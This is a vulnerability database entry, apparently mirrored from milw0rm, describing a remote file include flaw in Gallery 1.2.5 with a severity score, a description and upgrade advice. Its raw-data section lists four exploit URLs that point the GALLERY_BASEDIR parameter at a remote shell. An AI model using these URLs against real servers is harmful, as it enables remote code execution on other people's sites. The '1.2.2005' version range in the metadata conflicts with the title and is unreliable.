header-logo
Suggest Exploit
vendor:
Gallery
by:
milw0rm.com
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: Gallery
Affected Version From: 1.2.2005
Affected Version To: 1.2.2005
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Gallery 1.2.5 <= Remote File Include Vulnerabilities

The vulnerability allows remote attackers to include arbitrary files via a specially crafted URL in the GALLERY_BASEDIR parameter in needinit.php, reconfigure.php, unconfigured.php, and configmode.php scripts.

Mitigation:

Upgrade to a patched version of Gallery.
Source

Exploit-DB raw data:

# Gallery 1.2.5 <= Remote File Include Vulnerablites
# D.Script: http://www.gnu-darwin.org/packages/x86/www/gallery-1.2.5.tgz
# Exploit:[Path]/errors/needinit.php?GALLERY_BASEDIR=Shell
# Exploit:[Path]/errors/reconfigure.php?GALLERY_BASEDIR=Shell
# Exploit:[Path]/errors/unconfigured.php?GALLERY_BASEDIR=Shell
# Exploit:[Path]/errors/configmode.php?GALLERY_BASEDIR=Shell

# milw0rm.com [2007-04-15]

Navigation

Suggest Exploit

Services By CQR